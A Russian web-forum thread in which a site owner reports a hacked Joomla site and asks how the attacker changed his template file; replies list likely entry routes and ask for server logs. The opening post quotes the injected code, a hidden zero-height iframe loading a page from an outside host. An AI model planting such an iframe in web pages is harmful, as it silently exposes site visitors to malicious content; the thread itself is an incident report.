Похоже взломали сайт на джумле

A
На сайте с 12.10.2011
Offline
220
893

Первый раз сталкиваюсь со взломом джумлы, может кто подскажет..

При поиске по сайту в яндексе site:мойсайт.ru я увидел что пшите "небезопасно для посещения" или типа того

посмотрел код страницы через браузер - нашел такой код

<iframe name="SagUTeXYne" src="http://skysell.ru/kx/index.php?out=1331605369" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>

Посмотрел на своем компе этот файл (index.php в шаблоне) - без этого кода, значит кто то поменял..

Зашел через фтп, да есть такие изменения внутри файла в видно по дате

Скажите точно взломали фтп и поменяли через него, или можно изменить содержания файлов через панель джумлы (панель настроена для работы через фтп)? Пароль к панели джумлы кстати был слабый, забыл поменять после установки..

SeVlad
На сайте с 03.11.2008
Offline
1609
#1
alexverem:
может кто подскажет

А чо, в соседний топик никак не заглянуть?

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
A
На сайте с 12.10.2011
Offline
220
#2

у меня по-моему совершенно определенный случай, и возможно у кого то было тоже самое..

а в указанном топике я не нашел ответа, может тогда тыкните?

WebGomel
На сайте с 29.10.2011
Offline
78
#3
alexverem:

а в указанном топике я не нашел ответа, может тогда тыкните?

А тут нечего тыкать 😂

Вариантов несколько:

1. Через фтп

2. Через админку

3. Через шелл

4. Через уязвимость в джумле

5. Через коряво настроенный сервер

Каждый случай индивидуальный и нужно смотреть файлы, логи и так далее. Телепатией тут никто не обладает и конкретным советом вряд ли поможет.

Хотите реальной помощи - давайте доступ и помните что любой труд должен быть оплачен.

Не хотите платить - гугл с яндексом вам в помощь, они всё знают.

Удалённый системный администратор ( https://remadmin.com )
A
На сайте с 12.10.2011
Offline
220
#4

ясно спасибо, буду иметь в виду )

[Удален]
#5
SeVlad
На сайте с 03.11.2008
Offline
1609
#6
alexverem:
а в указанном топике я не нашел ответа,

на вопрос

alexverem:
точно взломали фтп

?

да?

Ок, серверные логи (входов на ФПТ и доступа к файлам) с момента ДО взлома - в студию. А также свой ИП и логин админа.

И да, если список логов большой - не знаю, найдётся ли кто за бесплатно их рассматривать ;)

Нет логов - нет точного ответа.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий